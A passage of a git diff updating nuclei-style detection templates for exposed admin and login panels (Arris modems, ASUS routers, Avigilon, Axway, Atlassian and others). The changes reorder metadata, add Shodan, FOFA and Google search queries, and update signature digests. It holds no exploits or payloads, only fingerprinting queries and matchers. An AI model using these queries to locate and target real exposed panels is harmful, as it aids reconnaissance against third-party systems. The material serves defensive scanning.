4b0a00483046022100f1e920029ab223d47552ebb51dbe68e974dd8b2d064b34d4c511819d6ef5d04d022100f04b08386868b3f6308d464cf43873c86fe31c3302d64bb19cd4967ccbcf9037:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b0fe46eeedfd7d75402634ec0af24f6657e3c725d982e73fc172b4356fb2492a022100be2368c6c77c1d134fe9952c35b1ccfc337e1bd72bffdead5ea76b23853d6b96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/arris-modem-detect.yaml b/http/exposed-panels/arris-modem-detect.yaml index 85b31d31f7..0bc7c44324 100644 --- a/http/exposed-panels/arris-modem-detect.yaml +++ b/http/exposed-panels/arris-modem-detect.yaml @@ -10,11 +10,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:h:commscope:dg3450:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: dg3450 - shodan-query: html:"phy.htm" - vendor: commscope verified: true + max-request: 1 + vendor: commscope + product: dg3450 + shodan-query: + - html:"phy.htm" + - http.html:"phy.htm" + fofa-query: body="phy.htm" tags: panel,arris,commscope http: @@ -32,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dccbca94cbd8601eaf684ba7e8cd9a3c023eb761b8124e6c5491cb03d400e8c402202be17f19304f05c61e103be475a92d1aebf706122dc68b89bfb612b0edadccd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206556d7dbb83b687e46684c70690fcf9b0879e9824bb32ecc772d452788a97729022100a996dbe9c2d2f3a53b9be8620f5b47c57e3cf9468bd07affd973b9a4416e11fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/aspcms-backend-panel.yaml b/http/exposed-panels/aspcms-backend-panel.yaml index 81821166f4..118940378d 100644 --- a/http/exposed-panels/aspcms-backend-panel.yaml +++ b/http/exposed-panels/aspcms-backend-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/GREENHAT7/pxplan/blob/main/goby_pocs/Aspcms_Backend_Leak.json metadata: - fofa-query: app="ASPCMS" - max-request: 2 verified: true + max-request: 2 + fofa-query: app="ASPCMS" tags: panel,login,aspcms,admin http: @@ -36,4 +36,4 @@ http: - 'status_code_1 == 200 && contains(body_1,"alert(")' - 'status_code_2 == 200 && contains(body_2,"var txtUserName = document.getElementById(")' condition: and -# digest: 4a0a00473045022100e039d5a7adae4d72297ac42094fd0ef69bf43894b8e392c474c653a8ba5f09110220163fad65f1b2a8d7040ca2d3816646e2cd5ca043cdd6b6f52bcd745a5901750d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220234479820f4cc17b655263c9954725359c7d3dcb06092d722a81fa09cc027c2d02204e2d96c6500cad3ed9161ad8d9b391630442e9f68ac7cc0dfc0332a2c71de186:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/aspect-control-panel.yaml b/http/exposed-panels/aspect-control-panel.yaml index 1ca2d40872..0310f67d1f 100644 --- a/http/exposed-panels/aspect-control-panel.yaml +++ b/http/exposed-panels/aspect-control-panel.yaml @@ -10,9 +10,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:1011076161 - verified: true tags: panel,aspect,login http: @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022003b01b7a0cb3aea69d9387f0308471dc8631a24f86d76679f6b2534af32eb3d0022100a89383c9692a2869bd83300f5e97a97fadf8d6b6f1c3e6e5acedef11e8beb997:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100989906bfb96b8203e8a21ebda6f2c17ac75c3684b69ea041b73595e823f908b8022032315c8eba027a1fb97942e8c402a09b9823bd48558dddc3498bd43f8e2d291f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/asus-aicloud-panel.yaml b/http/exposed-panels/asus-aicloud-panel.yaml index 035b14eb56..31542842c2 100644 --- a/http/exposed-panels/asus-aicloud-panel.yaml +++ b/http/exposed-panels/asus-aicloud-panel.yaml @@ -8,9 +8,9 @@ info: reference: - https://www.asus.com/in/content/aicloud/ metadata: + verified: "true" max-request: 1 shodan-query: title:"AiCloud" - verified: "true" tags: panel,asus,aicloud,detect http: @@ -30,4 +30,4 @@ http: - 200 - 401 condition: or -# digest: 4a0a00473045022100b633553cbf3cb807efd84cb1fe68e4e2290ce6d99d22b72d8a5d479da998ab2602202fb7f481cf9d2cd5f9d23ba28a929aec8e9f27efc893350ed71167bd8c75688e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022016e72d4898c27c35f421b20dcfc78043c09db902f68199adfa4cdba33bfd3de3022100a72b2d0de5301a83f765d388029dbb2af794347c278ed835b5ccf035f4d26f79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/asus-router-panel.yaml b/http/exposed-panels/asus-router-panel.yaml index 50dfe3aca4..d5a83241f2 100644 --- a/http/exposed-panels/asus-router-panel.yaml +++ b/http/exposed-panels/asus-router-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: 'Server: httpd/2.0 port:8080' - verified: true tags: panel,asus,router,iot http: @@ -30,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f6b434b60dc9836ffb8ad6dc737740ac3dae892a6c1b2011c677ad36d518971602203e69a5a5f15b7f8db34d6885f7e6855faa46cac581126fdb7cbb92c9827145b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220013b4fa906b724cd20d2829955b7e3eeea6be850891eb1ba6b0cfdb54010dfae022072bd289e736db517ec29c4cbaeaf01ca2a2ffac82e302a49a020fade085a682f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/atlantis-detect.yaml b/http/exposed-panels/atlantis-detect.yaml index b8b0ab3df1..c83e16f5c7 100644 --- a/http/exposed-panels/atlantis-detect.yaml +++ b/http/exposed-panels/atlantis-detect.yaml @@ -12,11 +12,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:runatlantis:atlantis:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: runatlantis product: atlantis shodan-query: http.favicon.hash:-1706783005 - vendor: runatlantis - verified: true + fofa-query: icon_hash=-1706783005 tags: panel,atlantis,runatlantis http: @@ -36,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f82fc01481176024c052e1e298f7cffd05aaf1868b51e2cf87b6e0d0b6799cba02200bb85fcae7ccbc15a106bdb1d32dfe806412d78574a92c3565b72a0eebf329ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a94e2bc336810593e5eab50619307e53134f2e9ecb740e3e4fdb817a389b6c8d02205c986a84c0d3c77cc80c875a52ab7b6d80f112661deec63774b05cf35681d8a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/atlassian-bamboo-panel.yaml b/http/exposed-panels/atlassian-bamboo-panel.yaml index f09d8afd9b..063013ca4e 100644 --- a/http/exposed-panels/atlassian-bamboo-panel.yaml +++ b/http/exposed-panels/atlassian-bamboo-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.atlassian.com/software/bamboo metadata: + verified: true max-request: 1 shodan-query: http.title:"Bamboo" - verified: true tags: panel,bamboo,login,detect http: @@ -41,4 +41,4 @@ http: regex: - 'version\s+([0-9A-Za-z\s\.]+)\s+-' - 'pvpVersion = "([a-z0-9.]+)";' -# digest: 4b0a00483046022100a964e7e553f1326fa41008524ff247a00a22f33e9f1dcebcafe996e8997d24d602210083a8c103431cac6bca37b6b353658618f0e3b3a61cf2996a975fa19b6070c6d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210099727a5abbecaa5c1b8c13cd1b71c340a8175e578f6b5270cec7ff7ec7379e7c02205452bdf7af914cb3b4312f848283737ae65dafc84a0cff7a1660d038e571bc52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/atlassian-crowd-panel.yaml b/http/exposed-panels/atlassian-crowd-panel.yaml index 46d60c3106..006624988f 100644 --- a/http/exposed-panels/atlassian-crowd-panel.yaml +++ b/http/exposed-panels/atlassian-crowd-panel.yaml @@ -11,10 +11,11 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:* metadata: - category: sso max-request: 1 - product: crowd vendor: atlassian + product: crowd + category: sso + shodan-query: http.component:"atlassian jira" tags: panel,atlassian http: @@ -35,4 +36,4 @@ http: regex: - 'value="Version: ([\d.]+)' part: body -# digest: 4b0a00483046022100f39c24cb5ce289f93523706314f26143e647f2870b8e07ddc97f68737dc29de4022100847bb0dc2724fa1ebc1794605f863302695d0c5b95f360ee559a0c6d212a9986:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ca72a1e06a41c70ac92038e0a3a38abc7001505e7f3a13bdb6d667e3918b9d7d022100a46a2c49f96ea9adb4fdaf7a12400d5dc698dbe16ba803050ff3602cd23e6899:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/audiobookshelf-panel.yaml b/http/exposed-panels/audiobookshelf-panel.yaml index 47a1227c37..eb418a7a00 100644 --- a/http/exposed-panels/audiobookshelf-panel.yaml +++ b/http/exposed-panels/audiobookshelf-panel.yaml @@ -7,9 +7,9 @@ info: reference: - https://github.com/advplyr/audiobookshelf metadata: + verified: true max-request: 2 shodan-query: title:"Audiobookshelf" - verified: true tags: panel,audiobookshelf,detect http: @@ -34,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022005d33f7b55e2318631d9a35582243793911cf44caa7570de0655afcb96b7c087022100d6627477aed96ce42ff3b817821d0634bc007f7e63aacb212eb9fefb95ec0367:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c1bbd8b09458d61a8f62108096d3cbd217a84079d55400f8cfbe227009e6895302210087a27dcd3c9933c40c6b3206a11877c5db9aa2c00800a9989666292af726fe7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/audiocodes-detect.yaml b/http/exposed-panels/audiocodes-detect.yaml index 31fd950bd3..1ee85584fe 100644 --- a/http/exposed-panels/audiocodes-detect.yaml +++ b/http/exposed-panels/audiocodes-detect.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.html:"Audiocodes" - verified: true tags: panel,audiocodes http: @@ -31,4 +31,4 @@ http: - type: status status: - 203 -# digest: 4a0a00473045022100b29ce2ad2ced6c154ef7287f7e2bf74247ed12c973fa8700cc3aa184f51f822702204420ed6a24a68b3a48b62a0eae4318e0333e1706241a6566136ab8166318a615:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022042541274fe96259fa947539432a417d8e8b36882776d2b0a644afb5849edef2d0220206fd57bf495066dec52e5abd9eb95e650b2b5a0ab135871f087c2288e689f25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/authelia-panel.yaml b/http/exposed-panels/authelia-panel.yaml index fbdb95d748..196d198a47 100644 --- a/http/exposed-panels/authelia-panel.yaml +++ b/http/exposed-panels/authelia-panel.yaml @@ -10,9 +10,9 @@ info: - https://github.com/authelia/authelia - https://www.authelia.com/ metadata: + verified: true max-request: 1 shodan-query: title:"Login - Authelia" - verified: true tags: login,panel,authelia http: @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008fd87b39284e84d585bb9f507cbcbbe83b8d7e6cdd73eb30ac8401c192cd19a2022061c03f9d86a08c9af5bb06582714b9d38aed4e8e104af2045c44c95392e0e73a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022011c652c8e4ad3e46de531e029c3bcd7fe019a1f7ef8a71aa7ef87b3d039c60d4022034538df50b7e165e8d36b3bbcb858d44a935fa2bc1592669221f17de9e1f0b50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/automatisch-panel.yaml b/http/exposed-panels/automatisch-panel.yaml index a9d888edee..a565208593 100644 --- a/http/exposed-panels/automatisch-panel.yaml +++ b/http/exposed-panels/automatisch-panel.yaml @@ -10,9 +10,9 @@ info: - https://automatisch.io/ - https://github.com/automatisch/automatisch metadata: + verified: true max-request: 2 shodan-query: title:"Automatisch" - verified: true tags: panel,automatisch,detect http: @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022035fe81f8489195b9067d4a0737e6e679ae53525803c06f578856012fdbdc1b100221008fd79bd81b27673d0a378a9f1cddf49f6c244e33a6087b2ee89cf09d85f71a4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203c0fc76e89d349cc359436d249df7d23e73c1c05572452611732c1e9c191dedf02210082d970687d4a767df2631f431e814547859cbae5d2731465dce39b7d76551678:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/autoset-detect.yaml b/http/exposed-panels/autoset-detect.yaml index d3d2b8c6d6..a9ac93f1b9 100644 --- a/http/exposed-panels/autoset-detect.yaml +++ b/http/exposed-panels/autoset-detect.yaml @@ -7,10 +7,10 @@ info: reference: - http://autoset.net/xe/ metadata: + verified: true max-request: 1 shodan-query: title:"AutoSet" - verified: true - tags: tech,php,autoset,apache + tags: tech,php,autoset,apache,panel http: - method: GET @@ -36,4 +36,4 @@ http: group: 1 regex: - 'AutoSet (\d+(\.\d+)+)\b' -# digest: 4a0a004730450221008749f06172560522b858602a0ab2e051598a9f3730cb7dd05f1d5dffa07b0ffc022007b0555f10f4c2d96fd37b2ff258e1c9281c56f3550a0c62f8560e312618b290:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220037d4ea4d6efd6711ded7e2106a453a089436d6e0da04a19f9ee5be28952a858022002dd36b72a3d791784c97884ac73c9485e23055cb872e178598bf17c05bc317e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/avantfax-panel.yaml b/http/exposed-panels/avantfax-panel.yaml index f2ed76974b..7b0075b13e 100644 --- a/http/exposed-panels/avantfax-panel.yaml +++ b/http/exposed-panels/avantfax-panel.yaml @@ -13,9 +13,13 @@ info: cpe: cpe:2.3:a:avantfax:avantfax:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: avantfax - shodan-query: http.title:"AvantFAX - Login" vendor: avantfax + product: avantfax + shodan-query: + - http.title:"AvantFAX - Login" + - http.title:"avantfax - login" + fofa-query: title="avantfax - login" + google-query: intitle:"avantfax - login" tags: panel,avantfax,login http: @@ -40,4 +44,4 @@ http: group: 1 regex: - '<p align="center">([0-9.]+)<\/p>' -# digest: 490a00463044022003d52cbba47ec2c8b4cae0872a5686fcf27efbf8a2a2a39fe2115c6f081eeab802202b7e87d630edfeb150abae4f6aa8e98bd7cb820a1b36e56ab6e9335d650ea28f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202f660132d55b67dea8144c7cfa35915e47ef4fdf7ae2347befd215163797cb0e02210082bd97c4450b607eb41e2a31725395ef1c7fc1c38fc1d32fb0c684f9a309edcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/avaya/avayaaura-cm-panel.yaml b/http/exposed-panels/avaya/avayaaura-cm-panel.yaml index e8a90e426a..0d073af63d 100644 --- a/http/exposed-panels/avaya/avayaaura-cm-panel.yaml +++ b/http/exposed-panels/avaya/avayaaura-cm-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:avaya:aura_communication_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: aura_communication_manager vendor: avaya + product: aura_communication_manager tags: panel,avaya http: @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b0a006b0b4214b31341131bca90abeb5abc213959a6e4dfa8fecfb1083ec3c120220258a337d808718ec2a09df2e4af04a565aa2015ec8188979aa142e387c387d80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fc80178b0b0753bf780a8d22cabda480e4cb0abae0a092b89825aae6e3e5460e02202329c4a0773355187eefa03d7c4729d0c31e0d97f17e972a837afe7dad1aac68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml b/http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml index ad8275d351..fb08e816e2 100644 --- a/http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml +++ b/http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:avaya:aura_system_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: aura_system_manager vendor: avaya + product: aura_system_manager tags: panel,avaya http: @@ -39,4 +39,4 @@ http: group: 1 regex: - "</sup> System Manager ([a-z0-9.]+)</h1>" -# digest: 490a004630440220742c535fcf40b698ab4d4ac8550eecc886cdc968e67e6f78e7ac0d1dd3c602090220667eabb92d12f1e20876c1644b471fee43924eedcae0fd0a674e774d05a522e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220154ae9bfa92630d43787a9a336f5d0ec1972051c60c0f8d3390c7cc1aa57970b022100dbb72cfd24d781e8676005f38996ddaf2a980b8f86f832c19d301e015a244798:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/aviatrix-panel.yaml b/http/exposed-panels/aviatrix-panel.yaml index 53e4233d1b..7ce87ccc90 100644 --- a/http/exposed-panels/aviatrix-panel.yaml +++ b/http/exposed-panels/aviatrix-panel.yaml @@ -12,9 +12,13 @@ info: cpe: cpe:2.3:a:aviatrix:controller:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: controller - shodan-query: http.title:"Aviatrix Cloud Controller" vendor: aviatrix + product: controller + shodan-query: + - http.title:"Aviatrix Cloud Controller" + - http.title:"aviatrix cloud controller" + fofa-query: title="aviatrix cloud controller" + google-query: intitle:"aviatrix cloud controller" tags: panel,aviatrix http: @@ -34,4 +38,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207fe85a753a31b3a6089a43a85527b34f42000af5a8e49713e19f0e12ccce963d0220569f10add1384df4bd2795ebaa3001b2ded432e76b449e85f3a2a7cb1ae269ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210085af6404b949da4595cda2561dea304767be72dc09bd849f5b2d307253394b1202206489e9b4a02960bb76f52007496f93d3e6ad5d843b3707060cf9f5c369f5f018:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/avigilon-panel.yaml b/http/exposed-panels/avigilon-panel.yaml index e685f90c2b..954d718aa0 100644 --- a/http/exposed-panels/avigilon-panel.yaml +++ b/http/exposed-panels/avigilon-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:avigilon:avigilon_control_center:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: avigilon_control_center - shodan-query: http.title:"Login - Avigilon Control Center" - vendor: avigilon verified: true + max-request: 1 + vendor: avigilon + product: avigilon_control_center + shodan-query: + - http.title:"Login - Avigilon Control Center" + - http.title:"login - avigilon control center" + fofa-query: title="login - avigilon control center" + google-query: intitle:"login - avigilon control center" tags: panel,avigilon http: @@ -39,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008a1100925f10bb7cfe702541f9583ad536cc6c872506c7491640e88651156dd5022100ec00500bb98ccd4e20c1c974b7df6f1fbdc4bd59a0be92da627e5e2279950f03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c9dc88a619d4b812ffec89ff20a8edd071ccd9de6345fdbd695d5753c39bc9f002210088439df4fd90c7a7c9e0d7dacf7a0674c28c040c117f334d227159bf43ef9eeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/aws-ec2-autoscale.yaml b/http/exposed-panels/aws-ec2-autoscale.yaml index bd21d67803..6d88fc9720 100644 --- a/http/exposed-panels/aws-ec2-autoscale.yaml +++ b/http/exposed-panels/aws-ec2-autoscale.yaml @@ -7,9 +7,9 @@ info: reference: - https://www.facebook.com/photo/?fbid=620605120110011&set=a.467014098802448 metadata: + verified: true max-request: 1 shodan-query: html:"AWS EC2 Auto Scaling Lab" - verified: true tags: exposure,ec2,aws,amazon,panel http: @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022042b6830d8c26c3df2548e65415fb60d85296fc59f89b74296bd2078a845114230220711859145df6213f2dd6aaf26b64437279cfff99849e5a6c8d3900d1aa7bcaf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100914770a771ff7b618b617717307b6e56f9ba083ce8d22da410cc9e3997ea8200022100f16fafc7b302da5335e6d59ab2832434d1f26be372c993946e5e87f507076a70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/aws-opensearch-login.yaml b/http/exposed-panels/aws-opensearch-login.yaml index 57a2128475..76837ae4c7 100644 --- a/http/exposed-panels/aws-opensearch-login.yaml +++ b/http/exposed-panels/aws-opensearch-login.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:amazon:opensearch:*:*:*:*:maven:*:*:* metadata: max-request: 1 - product: opensearch vendor: amazon + product: opensearch tags: panel,opensearch,aws,amazon http: @@ -31,4 +31,4 @@ http: - type: word words: - "Please login to OpenSearch Dashboards" -# digest: 4a0a00473045022100a545da3e16df9c30198e45761bd50b51f2e497bb38cb56da3c83608801fefbc8022045e5554e77ebb6d3bc952b7a79db1fdfb19d0bef9f53c9c228b4fc66566f5ac6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fe8d9a26949353d3f4e71706af941bfae2ebc0b13d27f949d01353a84eab70f9022100e8e25a3c928f13e1944fd0b5bbec3151b4eac4ee61a96dce15be94f1d9bf1966:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/axel-webserver.yaml b/http/exposed-panels/axel-webserver.yaml index 4bf951cac5..1438289474 100644 --- a/http/exposed-panels/axel-webserver.yaml +++ b/http/exposed-panels/axel-webserver.yaml @@ -9,10 +9,10 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: app="AxelWebServer" + verified: true max-request: 1 shodan-query: http.title:"Axel" - verified: true + fofa-query: app="AxelWebServer" tags: panel,axel,webserver http: @@ -37,4 +37,4 @@ http: group: 1 regex: - 'Axel MyWeb (.*)' -# digest: 4a0a0047304502210096153e74c6a2e5ac1654dba3ab425d62798426f6989aabf3d67a1971b7319c1502206fd9fb03d2f6bc24884cc51fa767485e2bfcdde7809c9f7c54733fff531f3fde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207dd98ee4507bb39aca1ec1107e0928587db8acc9e826b1aa38b5073869122e440221009734e82f0e1f884f64e27a686b1434d7f75c00937551c50e8806d97ca4aa3448:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/axway-api-manager-panel.yaml b/http/exposed-panels/axway-api-manager-panel.yaml index eb61cd9622..dedac60d4d 100644 --- a/http/exposed-panels/axway-api-manager-panel.yaml +++ b/http/exposed-panels/axway-api-manager-panel.yaml @@ -5,9 +5,9 @@ info: author: johnk3r severity: info metadata: + verified: true max-request: 1 shodan-query: http.title:"Axway API Manager Login" - verified: true tags: panel,axway,detect http: @@ -25,4 +25,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204f790ccc7c9c6170ee0b96b3e5272ec02a6bc8ee343ec4499daf4127816d353a02202c947c2b21c5ca1e791f27387d89c6eb57b460dcc55ce8d0d18425efb5645de9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009806e6b46f0d419351aea507da113cdc16e7d0bb46d91d3356f8404c5aacd303022100d97a07a55afba6cc59ae9c4884f13cdff91afe76fb8f880dfe067c7e963d6920:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/axway-securetransport-panel.yaml b/http/exposed-panels/axway-securetransport-panel.yaml index 91db597ee1..827494214a 100644 --- a/http/exposed-panels/axway-securetransport-panel.yaml +++ b/http/exposed-panels/axway-securetransport-panel.yaml @@ -13,11 +13,20 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:axway:securetransport:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: securetransport - shodan-query: http.title:"SecureTransport" || http.favicon.hash:1330269434 - vendor: axway verified: true + max-request: 1 + vendor: axway + product: securetransport + shodan-query: + - http.title:"SecureTransport" || http.favicon.hash:1330269434 + - http.title:"st web client" + - http.title:"securetransport" || http.favicon.hash:1330269434 + google-query: + - intitle:"st web client" + - intitle:"securetransport" || http.favicon.hash:1330269434 + fofa-query: + - title="securetransport" || http.favicon.hash:1330269434 + - title="st web client" tags: panel,axway,securetransport http: @@ -49,4 +58,4 @@ http: group: 1 regex: - '"SecureTransport", "([0-9.]+)",' -# digest: 490a0046304402201ddfb542843f60c8c38397fb6a9c1f5f17c699dd6dd28a57af33a73e703fbb4202202e61be853e13b2bd760ee27dc860715d4f64225ab567be6301b93ab4945a9bbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022054feef8f2efa9059abbc419acb76067d52a01b69ae814593fbf7ecbc7f1eea68022100c595e32c8240665e58beda612cfda99ca52e664b7e16e85b2ee98fd236ed5204:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/axway-securetransport-webclient.yaml b/http/exposed-panels/axway-securetransport-webclient.yaml index a26113b572..b90b05929f 100644 --- a/http/exposed-panels/axway-securetransport-webclient.yaml +++ b/http/exposed-panels/axway-securetransport-webclient.yaml @@ -12,11 +12,20 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:axway:securetransport:*:*:*:*:*:*:*:* metadata: - google-query: intitle:"ST Web Client" - max-request: 1 - product: securetransport - vendor: axway verified: true + max-request: 1 + vendor: axway + product: securetransport + google-query: + - intitle:"ST Web Client" + - intitle:"st web client" + - intitle:"securetransport" || http.favicon.hash:1330269434 + shodan-query: + - http.title:"st web client" + - http.title:"securetransport" || http.favicon.hash:1330269434 + fofa-query: + - title="securetransport" || http.favicon.hash:1330269434 + - title="st web client" tags: panel,axway,securetransport,webclient http: @@ -34,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e2af4e9ab70e4c0590f95e8328e0b1822647af1369ad37a2a5f8d881fd320c5a022100f9cd7ab9e9062175a6e078df81bdb18290a8fb2d1fec84782758ad276ac55a6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206b8680c58a864774467d905556e94c43cdb4c406ac445b50be3262d88156e1de022074103523ec7469d4941965a2311b4c26427af550c1f671201b7536a398135b6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/axxon-client-panel.yaml b/http/exposed-panels/axxon-client-panel.yaml index 81107ae2cc..f8c254b3b1 100644 --- a/http/exposed-panels/axxon-client-panel.yaml +++ b/http/exposed-panels/axxon-client-panel.yaml @@ -12,11 +12,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:axxonsoft:axxon_next:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: axxon_next - shodan-query: title:"Axxon Next client" - vendor: axxonsoft verified: true + max-request: 1 + vendor: axxonsoft + product: axxon_next + shodan-query: + - title:"Axxon Next client" + - http.title:"axxon next client" + fofa-query: title="axxon next client" + google-query: intitle:"axxon next client" tags: panel,axxon,vms,login,detect,axxonsoft http: @@ -34,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008affae577adb0db5da7604e6a7c72f2b9651f9b054b394ba247a422f3ba802ea022100f6409861a449db44afc01753220df1e6de8414ce7ab930a5550ed893a9bce656:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022020f132951dcaa4367eed8b8f4f2dbccb22afca8f1043ae2b49beaebc88e94bc602204675c7e76657d01b0cb1584bc35e49df33710dfdd8e18cc7cd55863229379883:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/bedita-panel.yaml b/http/exposed-panels/bedita-panel.yaml index ddb5e1c160..1f4f762de4 100644 --- a/http/exposed-panels/bedita-panel.yaml +++ b/http/exposed-panels/bedita-panel.yaml @@ -13,9 +13,13 @@ info: cpe: cpe:2.3:a:bedita:bedita:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: bedita - shodan-query: http.title:"BEdita" vendor: bedita + product: bedita + shodan-query: + - http.title:"BEdita" + - http.title:"bedita" + fofa-query: title="bedita" + google-query: intitle:"bedita" tags: panel,bedita http: @@ -40,4 +44,4 @@ http: group: 1 regex: - 'target="besite">(.*)
